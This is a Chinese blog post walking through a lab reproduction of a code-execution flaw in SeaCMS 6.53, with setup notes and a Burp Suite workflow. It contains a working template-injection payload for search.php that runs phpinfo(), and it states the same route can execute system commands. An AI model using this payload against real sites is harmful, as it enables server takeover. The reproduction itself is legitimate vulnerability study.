海洋CMS(SEACMS 6.53)环境搭建及漏洞利用

最新推荐文章于 2024-07-27 13:39:59 发布
最新推荐文章于 2024-07-27 13:39:59 发布
阅读量2.9k 收藏 7
点赞数 2
分类专栏: CVE CMS 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/n5xxxx__zy/article/details/96005747
版权

0x00搭建环境

mysql+php   用phpstudy即可

海洋6.53:https://pan.baidu.com/s/1Fk3G8KLMx8SEuXrU3iiqdQ 提取码:Bi6U  

下载好之后开始搭建, 将uploads里的所有文件复制到网站服务器中

包里有安装说明

 

0x01 开始复现

安装完毕后进入主页

 

设置代理127.0.0.1 8080端口, 打开BurpSuite抓包

 

这里直接用网上的poc  

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

我们复制过来看看效果

 

改好直接forward 过我们看下效果

 

0x02 漏洞利用

进一步利用,可以执行系统命令

 

 

n5xxxx__zy
关注
专栏目录
海洋cms模板,海洋cms模板程序源码,海洋cms模板制作方法
xiaomaseo的博客
03-27 1671
海洋cms模板,是DIY系列样式,优化重构了同系列的不足,海洋cms模板添加了更流行的元素和设计风格.海洋cms模板体积小代码质量高加载速度快对搜索引擎更友好,对懂技术的站长阅读起来更易扩展更方便,同时方便站长自行修改扩展主题样式我们未对前端任何代码(含JS)加密或压缩打乱。 海洋cms模板采用bootstrap框架开发,部分特效采用swiper插件(支持触屏,不兼容IE),支持自适应,适配所有主流设备,这样的话封面图片自动裁切不变形。海洋cms模板的初衷是为站长能够打造出一个高品质网站。海洋c.
【漏洞复现】海洋CMS6.28远程代码执行
weixin_47443077的博客
05-17 2553
【漏洞复现】海洋CMS6.28远程代码执行 文章目录【漏洞复现】海洋CMS6.28远程代码执行一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 该CMS6.28版本存在命令执行漏洞,攻击者可以通过远程命令执行入侵被攻击者主机。 二、漏洞原理 area参数处理过的地方经过字符是否非法判断之后,调用ech
海洋cms(海洋影视管理系统) v6.53
11-29
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立
海洋CMS v6.53 v6.54命令执行
weixin_30412577的博客
09-10 516
测试下载地址:https://pan.baidu.com/s/1jHQBKFk 至于分析实在是看的一脸懵逼就不累赘了。直接上exp 1 POST /haiyang/upload/search.php HTTP/1.1 2 Host: 192.168.238.128 3 Proxy-Connection: keep-alive 4 Content-Length: 21...
SeaCMS海洋影视管理系统远程代码执行漏洞复现
最新发布
holyxp的博客
07-27 661
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
seacms海洋影视管理系统 v6.53
11-29
seacms海洋影视管理系统 v6.53 更新日志 新增:微信公众平台模块优化:采集逻辑修复:部分文字描述错误 seacms海洋影视管理系统简介 海洋影视管理系统 (seacms,海洋cms)是一套专为不同
seacms_CNVD-2020-22721_v10.1漏洞分析与复现
一个努力学习网安的小牛马
10-27 1117
seacms漏洞复现详情
海洋cms v6.53 v6.54版本漏洞复现
weixin_44897902的博客
09-15 2313
参考 https://www.freebuf.com/vuls/150042.html https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg cms首页地址为:http://139.155.1.64/seacms(v6.53)/upload/ 漏洞存在地址为:http://139.155.1.64/seacms(v6...
海洋cms漏洞——search.php
qq_40554015的博客
02-13 5157
在i春秋做CTF的题,有一道“百度杯”CTF比赛 九月场的题叫做Test,是web类型。 打开发现是海洋CMS: 看到是cms,立马搜了一下海洋CMS漏洞,发现网上很多,主要是search.php存在漏洞。 开始解题: 1.在查询栏随便点一个: 看到这么一个url,可以构造一个payload: 不是很清楚为什么······ 2.菜刀连接 接下来就可以直接用菜刀连接了 没有flag,应该在数据库中, 找到search.php,打开看看: 发现包含了common.php
海洋cms V6.53.zip_full_seacms_海洋CMS
09-15
海洋CMS V6.53是一个全面更新的版本,专注于提供高效、稳定且功能丰富的网站内容管理系统。这个系统专为构建各类网站,特别是新闻资讯、视频分享等类型网站设计,具有高度可定制性和易于操作的特性。 "full seacms...
seacms 海洋PHP影视视频网站建站系统 v6.61.rar
07-10
seacms 海洋PHP影视网站建站系统是基于PHP MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能,是一套专为不同需求的站长而设计的视频点播系统。seacms 海洋影视管理系统具有模板众多、插件齐全、资源丰富,构架稳健,平滑升级等诸多优点。支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。   海洋PHP影视网站建站系统2018年5月7日 v6.61功能更新说明:   修复:部分服务器评论乱码问题   修复:默认模板二维码错误(jiathis停止服务)   修复:播放器上方提示无法显示https网址问题   新增:默认模板新增文章搜索页   修复:视频列表标签中顶踩标签不显示的错误   修复:关闭验证码时登陆按钮不显示的错误   优化:海报图片同步功能   还有更多更新说明请参见压缩包内官方文档。
seacms6.53源码
10-11
是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。
海洋CMS 影视管理系统
09-26
海洋CMS 影视管理系统,海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP+MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 3298
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
原生php开发cms,海洋cms视频内容管理系统v10.3 原生PHP代码+影视管理系统+视频点播系统+开源CMS...
weixin_33789376的博客
03-21 1096
源码类型:php源码源码版本:20.11.4最后更新:2020年11月4日19:32:28源码说明:海洋影视管理系统(seacms,海洋 cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需 5 分钟即可建立一个海量的视频讯息的行业网站。海洋 cms 采用 PHP+MYSQL 架构,原生 PHP 代码带来卓越的访问速度和负载...
海洋cms新手入门安装配置教程
苹果cms10好看的模板
03-12 3696
安装本系统前,请先确认您的服务器环境是否符合海洋cms环境要求: Windows 平台: IIS/Apache/Nginx + PHP(5.x) + MySQL(5.x) Linux/Unix 平台: Apache/Nginx + PHP (5.x) + MySQL(5.x) 安装步骤:以宝塔面板安装为例首先海洋cms官网下载系统源码:https://www.seacms.net/inde...
海洋cms(海洋视频内容管理系统) v12.5 bulid220618
weixin_70215279的博客
08-20 677
爱趣漫画是一款有着海量漫画资源在内的特色阅读型手机应用,专门为广大喜欢看漫画的用户打造,致力于打造出一个属于我们的阅读天堂!软件采用了非常独特的分图模式,图像与和文字能够清晰的展现出来,大家在手机上也能舒适地阅览漫画。最后,软件还会每天实时更新,也就是不管什么时候我们都能够在里面看到最新的漫画资源,尤其是当我们将自己喜欢的漫画加入到书架之后,我们下次阅读起来也就要更加方便许多了。夜间模式可调节亮度、过滤番外、添加本地漫画、书签、自动播放等超多功能,等你来发现!去掉广告,页面简洁,想看啥就搜啥,非常方便。..
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值